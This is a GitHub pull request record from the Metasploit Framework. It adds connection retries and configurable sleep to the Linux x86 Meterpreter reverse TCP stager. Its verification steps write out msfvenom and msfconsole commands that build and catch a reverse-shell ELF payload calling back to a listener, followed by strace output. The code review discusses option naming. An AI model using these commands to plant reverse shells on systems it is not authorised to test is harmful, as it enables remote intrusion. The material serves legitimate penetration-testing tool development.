### PR TITLE
add retry support to linux x86 reverse tcp stager

### PR DESCRIPTION
**Pull request by tkmru**
I add retry routine to reverse tcp x86 for [linux stagers need to support retries / delays like the Windows stagers do · Issue #8382 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/8382). I add StagerRetryWait options.

## Verification

List the steps needed to make sure this thing works

- [x] ./msfconsole -qx "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set lhost ip_addr; set lport port; set ExitOnSession false; run -j"
- [x] follow commands

```
$ ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.132.1 LPORT=4444 ReverseConnectRetries=3 StagerRetryWait=3 -f elf -o "../reverse_tcp_test"
$ sudo chmod +x ./reverse_tcp_test
$ strace ./reverse_tcp_test
execve("./reverse_tcp_test", ["./reverse_tcp_test"], [/* 74 vars */]) = 0
[ Process PID=18549 runs in 32 bit mode. ]
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({3, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({3, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 102) = -1 ECONNREFUSED (Connection refused)
nanosleep({3, 0}, NULL)                 = 0
_exit(1)                                = ?
+++ exited with 1 +++
```

### CODE REVIEW

**Comment by tkmru** [comment]
Is sleep() necessary?

**Comment by busterb** [comment]
sleep() is useful when there is a network connectivity issue.

If the stager can retry for a few minutes, there is a better chance it will succeed later, rather than doing all of the retries at once and failing.

**Comment by tkmru** [comment]
I think that by default, 1 sleep() wait for 10sec. Do you think this is ok?

**Comment by busterb** [comment]
yeah, that seems reasonable to me. There is a parameter that other payloads use for the interval as well. If you can make it configurable the same way, even better.

**Comment by tkmru** [comment]
I change to call sleep in payload and, add sleepSeconds, sleepNanoseconds options.

**Comment by busterb** [comment]
Checking this out again now, thanks.

File: lib/msf/core/payload/linux/reverse_tcp.rb [hunk 1]
```diff
@@ -29,6 +29,8 @@ def generate
       port:        datastore['LPORT'],
       host:        datastore['LHOST'],
       retry_count: datastore['ReverseConnectRetries'],
+      sleep_seconds:  datastore['SleepSeconds'],
```
Comment (timwr) [inline lib/msf/core/payload/linux/reverse_tcp.rb]: I wonder if we should try rename these to be consistent.
It's known as `StagerRetryWait` here: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_http.rb#L33
and on Android it's `SessionRetryWait` (for both established sessions and the payload).

Comment (tkmru) [inline lib/msf/core/payload/linux/reverse_tcp.rb]: I did not know. I will rewrite to ```StagerRetryWait```.

Comment (tkmru) [inline lib/msf/core/payload/linux/reverse_tcp.rb]: Is nanoseconds no need?

Comment (timwr) [inline lib/msf/core/payload/linux/reverse_tcp.rb]: Yeah there is no need for it I think. Seconds is fine

**Comment by busterb** [comment]
I have a few more commits that I'll push into this as well.

**Comment by busterb** [comment]
Sorry for the delay, there were a few neat things I wanted to add to this PR (it works well).

The difference between StagerRetryCount and ReverseConnectRetries was silly (we should have had them all be the same originally), so I added 'alias' support to the datastore so they could be unified, but still keeping the old names so that RC scripts and existing users would continue working.

This also makes it so that decimal / float values can be specified, which allows adding fractional seconds. Then a single parameter can actually take advantage of the nanosecond sleep parameter by just specifying a fraction. Additional commits below:

4ca68a178b - switch reverse_tcp stagers to all prefer StagerRetryCount
bca8e77163 - add alias support for datastore options
b35d53bd02 - code cleanup in opt_int while we're here
47dc3772a7 - add OptFloat datastore option
331279d891 - handle fractional seconds

**Comment by busterb** [comment]
## Release Notes

This improves the reliability and usability of Linux x86 reverse_tcp stagers by adding a retry and sleep to the connect loop, allowing the stager to work even if there is a transient network failure. This also unifies the retry option name between reverse_tcp and reverse_http stagers so that they all support `StagerRetryCount` consistently.

**Pull request merged**